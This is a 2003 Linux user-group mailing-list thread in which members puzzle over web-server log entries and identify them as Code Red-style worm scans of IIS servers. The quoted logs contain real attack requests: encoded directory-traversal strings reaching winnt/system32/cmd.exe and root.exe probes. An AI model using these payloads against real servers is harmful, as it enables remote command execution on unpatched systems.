Fellow,
U mean that this ip address from Non-authoritative answer: want to hack
3.135.138.202.in-addr.arpa name = reol.ph. - this one? 202.138.135.3
3.135.138.202.in-addr.arpa name = proxy.reol.ph. this one?
Authoritative answers can be found from:
135.138.202.in-addr.arpa nameserver = dns02.digitelone.com.
135.138.202.in-addr.arpa nameserver = dns01.digitelone.com.
dns01.digitelone.com internet address = 202.138.128.1
dns02.digitelone.com internet address = 202.138.128.2
Anong makukuha nya sa server ko? y is that something a
winnt\system32\cmd.exe? IIS for MS app.
oninz
> code red or some other worm scanning for vulnerable IIS webservers to
> infect
>
> no worries... unless you got an unpatched IIS box :)
>
> Allen Umlas wrote:
>
>>
>> 202.54.67.195 - - [17/Feb/2003:16:09:02 +0800] "0^A^E6p�^��}
>> 6Zƻ�h9��A^E6p�^��} 6Zƻ�h9�4.0 ($
>> 202.54.67.195 - - [17/Feb/2003:16:09:51 +0800] "0^A^E6p�^��}
>> 6Zƻ�h9���0^A^E6p�^��} 6Zƻ�h9� "$
>> 202.54.67.195 - - [17/Feb/2003:16:10:08 +0800]
>> "� �U4�&^_��$^_��a�p� �U4�&^_��$^_��a�p�$0 1501
>> 202.138.177.36 - - [17/Feb/2003:16:13:34 +0800] "GET
>> /webmail/src/left_main.php HTTP/1.1" 200 1902
>> 202.138.135.3 - - [17/Feb/2003:16:15:25 +0800] "GET
>> /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-$
>> 202.138.135.3 - - [17/Feb/2003:16:15:39 +0800] "GET
>> /MSADC/root.exe?/c+dir HTTP/1.0" 404 281 "-" $
>> 202.138.135.3 - - [17/Feb/2003:16:15:40 +0800] "GET
>> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 40$
>> 202.138.135.3 - - [17/Feb/2003:16:15:42 +0800] "GET
>> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 40$
>> 202.138.135.3 - - [17/Feb/2003:16:15:44 +0800] "GET
>> /scripts/..%255c../winnt/system32/cmd.exe?/c+$
>> 202.138.135.3 - - [17/Feb/2003:16:15:46 +0800] "GET
>> /_vti_bin/..%255c../..%255c../..%255c../winnt$
>> 202.138.135.3 - - [17/Feb/2003:16:15:51 +0800] "GET
>> /_mem_bin/..%255c../..%255c../..%255c../winnt$
>> 202.138.135.3 - - [17/Feb/2003:16:15:53 +0800] "GET
>> /msadc/..%255c../..%255c../..%255c/..%c1%1c..$
>> 202.138.135.3 - - [17/Feb/2003:16:15:57 +0800] "GET
>> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c$
>> 202.138.135.3 - - [17/Feb/2003:16:16:20 +0800] "GET
>> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c$
>> 202.138.135.3 - - [17/Feb/2003:16:16:25 +0800] "GET
>> /scripts/..%c0%af../winnt/system32/cmd.exe?/c$
>> 202.138.135.3 - - [17/Feb/2003:16:16:30 +0800] "GET
>> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c$
>> 202.138.135.3 - - [17/Feb/2003:16:16:37 +0800] "GET
>> /scripts/..%%35%63../winnt/system32/cmd.exe?/$
>> 202.138.135.3 - - [17/Feb/2003:16:16:42 +0800] "GET
>> /scripts/..%%35c../winnt/system32/cmd.exe?/c+
>> 202.138.135.3 - - [17/Feb/2003:16:16:47 +0800] "GET
>> /scripts/..%25%35%63../winnt/system32/cmd.exe$
>>
>>
>> oninz
>>
>>
>>
>> _________________________________________________________________ Help
>> STOP SPAM with the new MSN 8 and get 2 months FREE*
>> http://join.msn.com/?page=features/junkmail
>>
>> _
>> Philippine Linux Users Group. Web site and archives at
>> http://plug.linux.org.ph
>> To leave: send "unsubscribe" in the body to
>> [EMAIL PROTECTED]
>>
>> Fully Searchable Archives With Friendly Web Interface at
>> http://marc.free.net.ph
>>
>> To subscribe to the Linux Newbies' List: send "subscribe" in the body
>> to [EMAIL PROTECTED]
>
>
>
> _
> Philippine Linux Users Group. Web site and archives at
> http://plug.linux.org.ph To leave: send "unsubscribe" in the body to
> [EMAIL PROTECTED]
>
> Fully Searchable Archives With Friendly Web Interface at
> http://marc.free.net.ph
>
> To subscribe to the Linux Newbies' List: send "subscribe" in the body
> to [EMAIL PROTECTED]
-----------------------------------------
This email was sent using SquirrelMail.
"Webmail for nuts!"
http://squirrelmail.org/
_
Philippine Linux Users Group. Web site and archives at http://plug.linux.org.ph
To leave: send "unsubscribe" in the body to [EMAIL PROTECTED]
Fully Searchable Archives With Friendly Web Interface at http://marc.free.net.ph
To subscribe to the Linux Newbies' List: send "subscribe" in the body to
[EMAIL PROTECTED]
